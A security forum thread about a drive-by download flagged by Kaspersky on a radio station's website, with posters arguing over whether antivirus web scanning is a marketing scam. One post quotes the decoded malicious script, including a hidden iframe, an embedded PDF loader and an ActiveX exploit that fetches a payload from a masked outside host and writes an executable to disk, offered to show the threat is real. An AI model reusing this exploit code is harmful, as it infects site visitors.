This is the first time I visited an infected website!

Today I visited the website of a radio station. Immediately Kaspersky Internet Security alerted me that "virus HEUR: Trojan.Script.Heuristic" was detected. At first I thought that this was a false positive and I sent a request to Kaspersky Lab. They replied to me in about an hour and they informed me that this was not a false positive and that its detection will be added in the next update. So excellent job for Kaspersky heuristics and Kaspersky Lab for its prompt reaction.
What is more, I learned something very important.
I had never visited before an infected website which downloads automatically malware (at least my previous antivirus ESET Smart Security had not detected anything ) and I thought that somebody will be infected via internet only when they download files from unknown websites. (I had downloaded malware in this way two times in the past). I was wrong!
I do not know if the radio station infected its website itself or somebody else did it.
What I know now is only this: A decent antivirus programme is indispensable nowadays.

 

Yeah, quite surprising what you can find, even if you think the Website is safe.
A Few weeks back I was surfing and a Box appeared telling me that I had infections on my PC. I knew it was a rogue, but like an idiot I clicked cancel thinking the Box would disappear (Rogues don't understand cancel ). I was redirected to a Rogue Anti-virus website, but I closed up the browser before it could go any further and I was not infected.

 

Yes that is common, but in that event best to shutdown the internet connection or simply unplug the LAN cable reboot the PC. Otherwise these prompts on the network are smart to tell if you press yes or cancel since both are set to yes no matter what you do..

 

Well, I see how efective is having installed an AntiVirus with HTTP traffic scanning capabilities because they scan for malicious scripts embedded in many Web pages.

So far, I know that Eset NOD32, Kaspersky, Avira and Avast! have this capability of scanning HTTP traffic before IE (or Firefox?) download the contents of the web site to your PC.

Although, I don't know how Windows Vista IE “Protected Mode” , could also be helpful regarding these kind of threats.

Best regards,

Carlos

 

that would be the relatively new kjim script heuristics.
the kaspersky heristics are getting better all the time.
the heristics detected an email attachment malware awhile back.
I thought it was malware anyway since it was from an email with attachment from an unknown sourse so was gonna delete email anyway.

 

Can you give us a hint at the website (just dont make it an active link) I would be interested to see what exactly it was trying to download

 

and there are still people saying HTTP scanning is useless

 

Solution... Firefox + NoScript add-on.

 

It is... it's a marketing scam.

I can visit every website in the world and not get "infected" with anything.

 

This is exactly what Kaspersky was hoping for.. word of mouth advertisement.

It's all a BIG SCAM.. to hook the ignorant to buy their products and to tell others how "good" their products are that it picked up this and that... blah blah blah.

Marketing scam, deceptive, and down right ridiculous.

Only the ignorant fall for it.

 

thats a pretty bold statement...

 

do you? good luck then

 

Bold, but true

Come on guys and gals, don't be so gullible. This reminds me of the days when John McAfee was caught writing his own virus' so that people would think McAfee AV was the best one out there, catching the "new virus'" before any other AV

Come on people... grow some brains,,, dont be fools.

 

hmm well im glad u think that, good luck

 

I will prove it and put my money where my mouth is... post the "infected" website and I will visit it.

 

ye i can throw on sandboxie and know im 99.99% protected (cuz nothing is 100%) but when ur just surfing normally without sandbox and might not be expecting an infected site, then boom, for all u know it could be a site u always go to thats been hijacked and then it hits u...

 

It's good to know KL picked this up, but I would suggest that if the site is still infected, some contact is made with the webmaster of it so it can be removed and cleaned up. It's one thing you being protected from it, but they still need to clean the malware off the site.

This happened to a legitimate site I know of and the source code revealed javascript that shouldn't have been there. Yes, KL detected it by heuristics and later by signature detection, but contact was made with the site owners to alert them to the problem. In a relatively short while, they removed the malware, and KL no longer detected the threat on that site.

 

The protected mode of IE is a very strong solution to avoid this "drive-by downloads" because the needed rights to change the system are not provided. You have to accept any installation from the TIF via UAC.

 

Yes, one of the best protection methods against these, but usability to the "average user" is a big down-side (layouts of websites etc).

Mate, we all have our own opinions and I respect that, but calling everyone who thinks something is useful "ignorant" and "fools" just because you do not agree... well, its not exactly a clever thing to say.

Please respect others and their opinions.

 

Hmm, yes they are lying to steal your money

Let me give you an example:

Obfuscated script detected by heuristics.... blocked before it can do any damage.

Unobfuscated form:

Code:

<iframe src="http://jL.-----.pl/rc/” style=“display:none”>

Mangled the links to prevent infection.

That leads to another script (also detected by heurisitcs) which you can see here:
paste2.org/p/193626 (safe link, text dump only)

After decrypting that one, looks more like this:
paste2.org/p/193630 (safe link again)


Most important parts:

Code:

.....
if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}
if (obj) {document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.----.pl/rc/pdf.php?id=460939' type='application/pdf'></embed>";}
} catch(e) {
document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.----.pl/rc/pdf.php?id=460939' type='application/pdf'></embed>";

......
function snpac(){
var buf1 = 'http://jl.-----.pl/rc/load.php?id=460939&spl=4';
try{
var obj = document.createElement('object');
obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
obj.setAttribute("id", "obj");
obj.SnapshotPath = buf1;
obj.CompressedPath = 'C:\NOFCym2lizm5Rw35.exe';
obj.PrintSnapshot();
} catch(e) {}
setTimeout("pdf()", 300);
}

attack(1);

0

Guess what this code does then.....


2 nice files, 8796.pfd and load.exe


It's all good walking around with a smug look on your face telling people they are idiots but the fact is would you rather be one of these ignorant people who use antivirus and trust heuristics or put yourself up against a fully fledged pdf exploit (15/40)+virut payload (21/40) that even sandboxie may not be able to save you from?

And please don't come back with something impractical like "use linux" or "use sandboxie and forget your AV" or "use an imaging program" because it may be good for you, but for most home users it's entirely impractical because they have no idea what a sandbox is, what kind of animal a linux is or what the difference between a disk imager and photoshop is.

 

You may be an experienced user and maybe you will be able to avoid viruses without the help of an antivirus. But is any single user as experienced as you and know how to prevent viruses alone? I think that the overall percentage of the people than can do this is about 5%. Does everyone know Sandboxie and NoScript? I learned about them only when I started visiting this forum six months ago. And in these six months I enhanced my knowledge of computer security a lot and I can assure you that I am neither "ignorant" nor "fool".But does anyone know the existence of this forum to be informed?

I am not an employee of Kaspersky and I do not try to make you buy this product by posting positive comments. I wanted simply to tell you that Kaspersky detected "Drive-By-Downloads" malware that maybe would detect and other antiviruses.

I thought that in this forum someone can also express their opinion about antiviruses. However, when I posted positive comments about Kaspersky, I became "ignorant", "fool" and somebody who spreads scams. Right?

 

I'm glad you did , and am always really glad to see posts with experience of a real world malware activity.

I don't know anything about the usefullness or otherwise of HTTP scanning.

However I would be highly surprised - to say the least - if a large AV company had a routine policy of lying to customers about the usefulness of a specific aspect of their product , which is the logical conclusion of what the other poster is claiming.

 

Pardon my naiveté, but are you saying the download started automatically?
Versus prompted for a DL, or redirected to a DL site?
Which browser are you using?

Cheers

 

I can visit any "infected" website just using firefox and Vista, no sandboxie and still nothing will infect my Vista.

 

You have raised some intelligent, valid and fair comments. Point taken.

But I still fail to see how a website can automatically begin to download something without user knowledge, and then install itself on their windows without user approval. Can you show me a website that can do that?